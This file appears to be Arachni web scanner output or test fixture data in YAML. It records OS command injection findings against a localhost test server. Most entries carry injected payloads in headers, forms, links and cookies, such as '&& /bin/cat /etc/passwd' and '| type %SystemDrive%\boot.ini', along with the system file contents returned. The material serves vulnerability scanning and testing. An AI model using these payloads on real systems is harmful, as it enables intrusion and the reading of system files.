TW9uLCAxMSBGZWIgMjAxMyAwMTozOToxOCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Operating system command injection
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands."
tags:
- os
- command
- code
- injection
- regexp
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection
variations: []
internal_modname: OSCmdInjection
internal_modname: OSCmdInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
var: User-Agent
url: http://localhost:12305/unix/header/straight
elem: header
method: GET
name: Operating system command injection
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands."
tags:
- os
- command
- code
- injection
- regexp
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
opts:
:redundant: false
:async: true
:regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+)
:match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
:substring:
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:injected_orig: ! '&& /bin/cat /etc/passwd'
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: ! '&& /bin/cat /etc/passwd'
:injected: ! '&& /bin/cat /etc/passwd'
:combo:
User-Agent: ! '&& /bin/cat /etc/passwd'
:action: http://localhost:12305/unix/header/straight
:verification:
:id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
var: User-Agent
url: http://localhost:12305/unix/header/straight
injected: ! '&& /bin/cat /etc/passwd'
id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+)
regexp_match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
elem: header
remarks:
:stuff:
- Blah
- Blah2
method: GET
response: ! '["root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\n"]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: ! '&& /bin/cat /etc/passwd'
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NzY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMTozOToyNiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Operating system command injection
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands."
tags:
- os
- command
- code
- injection
- regexp
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection
variations: []
internal_modname: OSCmdInjection
internal_modname: OSCmdInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
var: User-Agent
url: http://localhost:12305/unix/header/append
elem: header
method: GET
name: Operating system command injection
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands."
tags:
- os
- command
- code
- injection
- regexp
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
opts:
:redundant: false
:async: true
:regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+)
:match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
:substring:
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:injected_orig: ! ' /bin/cat /etc/passwd'
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: arachni_user /bin/cat /etc/passwd
:injected: arachni_user /bin/cat /etc/passwd
:combo:
User-Agent: arachni_user /bin/cat /etc/passwd
:action: http://localhost:12305/unix/header/append
:verification:
:id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
var: User-Agent
url: http://localhost:12305/unix/header/append
injected: arachni_user /bin/cat /etc/passwd
id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+)
regexp_match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
elem: header
remarks: {}
method: GET
response: ! '["root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\n"]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: arachni_user /bin/cat /etc/passwd
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NzY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMTozOToyNyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Operating system command injection
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands."
tags:
- os
- command
- code
- injection
- regexp
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection
variations: []
internal_modname: OSCmdInjection
internal_modname: OSCmdInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
var: input
url: http://localhost:12305/windows/form/straight
elem: form
method: POST
name: Operating system command injection
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands."
tags:
- os
- command
- code
- injection
- regexp
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
opts:
:redundant: false
:async: true
:regexp: (?-mix:\[boot loader\](.*)\[operating systems\])
:match: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n
:substring:
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:injected_orig: ! ' type %SystemDrive%\\boot.ini'
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": ! ' type %SystemDrive%\\boot.ini'
:follow_location: true
:injected: ! ' type %SystemDrive%\\boot.ini'
:combo:
!binary "aW5wdXQ=": ! ' type %SystemDrive%\\boot.ini'
:action: http://localhost:12305/windows/form/straight
:verification:
:id: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n
var: input
url: http://localhost:12305/windows/form/straight
injected: ! ' type %SystemDrive%\\boot.ini'
id: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n
regexp: (?-mix:\[boot loader\](.*)\[operating systems\])
regexp_match: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n
elem: form
remarks: {}
method: POST
response: ! '["[boot loader]\ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n[operating
systems]\nmulti(0)disk(0)rdisk(0)partition(1)\\WINDOWS=\"Microsoft Windows XP
Professional\" /fastdetect\n"]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjAy
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMTozOToyOCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Operating system command injection
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands."
tags:
- os
- command
- code
- injection
- regexp
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection
variations: []
internal_modname: OSCmdInjection
internal_modname: OSCmdInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
var: input
url: http://localhost:12305/windows/form/append
elem: form
method: GET
name: Operating system command injection
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands."
tags:
- os
- command
- code
- injection
- regexp
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
opts:
:redundant: false
:async: true
:regexp: (?-mix:\[boot loader\](.*)\[operating systems\])
:match: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n
:substring:
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:injected_orig: ! '&& type %SystemDrive%\\boot.ini'
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": default&& type %SystemDrive%\\boot.ini
:follow_location: true
:injected: default&& type %SystemDrive%\\boot.ini
:combo:
!binary "aW5wdXQ=": default&& type %SystemDrive%\\boot.ini
:action: http://localhost:12305/windows/form/append
:verification:
:id: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n
var: input
url: http://localhost:12305/windows/form/append
injected: default&& type %SystemDrive%\\boot.ini
id: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n
regexp: (?-mix:\[boot loader\](.*)\[operating systems\])
regexp_match: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n
elem: form
remarks: {}
method: GET
response: ! '["[boot loader]\ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n[operating
systems]\nmulti(0)disk(0)rdisk(0)partition(1)\\WINDOWS=\"Microsoft Windows XP
Professional\" /fastdetect\n"]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjAy
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMTozOToyOCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Operating system command injection
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands."
tags:
- os
- command
- code
- injection
- regexp
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection
variations: []
internal_modname: OSCmdInjection
internal_modname: OSCmdInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
var: input
url: http://localhost:12305/windows/link/straight?input=default
elem: link
method: GET
name: Operating system command injection
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands."
tags:
- os
- command
- code
- injection
- regexp
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
opts:
:redundant: false
:async: true
:regexp: (?-mix:\[boot loader\](.*)\[operating systems\])
:match: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n
:substring:
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:injected_orig: ; type %SystemDrive%\\boot.ini
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": ; type %SystemDrive%\\boot.ini
:follow_location: true
:injected: ; type %SystemDrive%\\boot.ini
:combo:
!binary "aW5wdXQ=": ; type %SystemDrive%\\boot.ini
:action: http://localhost:12305/windows/link/straight?input=default
:verification:
:id: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n
var: input
url: http://localhost:12305/windows/link/straight?input=default
injected: ; type %SystemDrive%\\boot.ini
id: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n
regexp: (?-mix:\[boot loader\](.*)\[operating systems\])
regexp_match: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n
elem: link
remarks: {}
method: GET
response: ! '["[boot loader]\ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n[operating
systems]\nmulti(0)disk(0)rdisk(0)partition(1)\\WINDOWS=\"Microsoft Windows XP
Professional\" /fastdetect\n"]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjAy
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMTozOTozMCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Operating system command injection
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands."
tags:
- os
- command
- code
- injection
- regexp
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection
variations: []
internal_modname: OSCmdInjection
internal_modname: OSCmdInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
var: input
url: http://localhost:12305/windows/link/append?input=default
elem: link
method: GET
name: Operating system command injection
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands."
tags:
- os
- command
- code
- injection
- regexp
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
opts:
:redundant: false
:async: true
:regexp: (?-mix:\[boot loader\](.*)\[operating systems\])
:match: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n
:substring:
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:injected_orig: ! ' type %SystemDrive%\\boot.ini'
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": default type %SystemDrive%\\boot.ini
:follow_location: true
:injected: default type %SystemDrive%\\boot.ini
:combo:
!binary "aW5wdXQ=": default type %SystemDrive%\\boot.ini
:action: http://localhost:12305/windows/link/append?input=default
:verification:
:id: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n
var: input
url: http://localhost:12305/windows/link/append?input=default
injected: default type %SystemDrive%\\boot.ini
id: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n
regexp: (?-mix:\[boot loader\](.*)\[operating systems\])
regexp_match: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n
elem: link
remarks: {}
method: GET
response: ! '["[boot loader]\ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n[operating
systems]\nmulti(0)disk(0)rdisk(0)partition(1)\\WINDOWS=\"Microsoft Windows XP
Professional\" /fastdetect\n"]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjAy
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMTozOTozMCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Operating system command injection
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands."
tags:
- os
- command
- code
- injection
- regexp
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection
variations: []
internal_modname: OSCmdInjection
internal_modname: OSCmdInjection
- !ruby/object:Arachni::Issue
verification: true
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
var: cookie2
url: http://localhost:12305/windows/cookie/append
elem: cookie
method: GET
name: Operating system command injection
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands."
tags:
- os
- command
- code
- injection
- regexp
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
opts:
:redundant: false
:async: true
:regexp: (?-mix:\[boot loader\](.*)\[operating systems\])
:match: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n
:substring:
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:injected_orig: ! ' type %SystemDrive%\\boot.ini'
:altered: !binary |-
Y29va2llMg==
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2llMg==": cookie value type %SystemDrive%\\boot.ini
:injected: cookie value type %SystemDrive%\\boot.ini
:combo:
!binary "Y29va2llMg==": cookie value type %SystemDrive%\\boot.ini
:action: http://localhost:12305/windows/cookie/append
:verification:
:id: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n
var: cookie2
url: http://localhost:12305/windows/cookie/append
injected: cookie value type %SystemDrive%\\boot.ini
id: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n
regexp: (?-mix:\[boot loader\](.*)\[operating systems\])
regexp_match: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n
elem: cookie
remarks: {}
method: GET
response: ! '["[boot loader]\ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n[operating
systems]\nmulti(0)disk(0)rdisk(0)partition(1)\\WINDOWS=\"Microsoft Windows XP
Professional\" /fastdetect\n"]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value+type+%25SystemDrive%25\\boot.ini;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjAy
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMTozOTozMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Operating system command injection
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands."
tags:
- os
- command
- code
- injection
- regexp
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection
variations: []
internal_modname: OSCmdInjection
internal_modname: OSCmdInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
var: cookie
url: http://localhost:12305/windows/cookie/straight
elem: cookie
method: GET
name: Operating system command injection
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands."
tags:
- os
- command
- code
- injection
- regexp
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
opts:
:redundant: false
:async: true
:regexp: (?-mix:\[boot loader\](.*)\[operating systems\])
:match: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n
:substring:
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:injected_orig: ! '| type %SystemDrive%\\boot.ini'
:altered: !binary |-
Y29va2ll
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2ll": ! '| type %SystemDrive%\\boot.ini'
:injected: ! '| type %SystemDrive%\\boot.ini'
:combo:
!binary "Y29va2ll": ! '| type %SystemDrive%\\boot.ini'
:action: http://localhost:12305/windows/cookie/straight
:verification:
:id: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n
var: cookie
url: http://localhost:12305/windows/cookie/straight
injected: ! '| type %SystemDrive%\\boot.ini'
id: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n
regexp: (?-mix:\[boot loader\](.*)\[operating systems\])
regexp_match: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n
elem: cookie
remarks: {}
method: GET
response: ! '["[boot loader]\ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n[operating
systems]\nmulti(0)disk(0)rdisk(0)partition(1)\\WINDOWS=\"Microsoft Windows XP
Professional\" /fastdetect\n"]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=|+type+%25SystemDrive%25\\boot.ini
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjAy
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMTozOTozNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Operating system command injection
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands."
tags:
- os
- command
- code
- injection
- regexp
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection
variations: []
internal_modname: OSCmdInjection
internal_modname: OSCmdInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
var: User-Agent
url: http://localhost:12305/windows/header/append
elem: header
method: GET
name: Operating system command injection
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands."
tags:
- os
- command
- code
- injection
- regexp
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
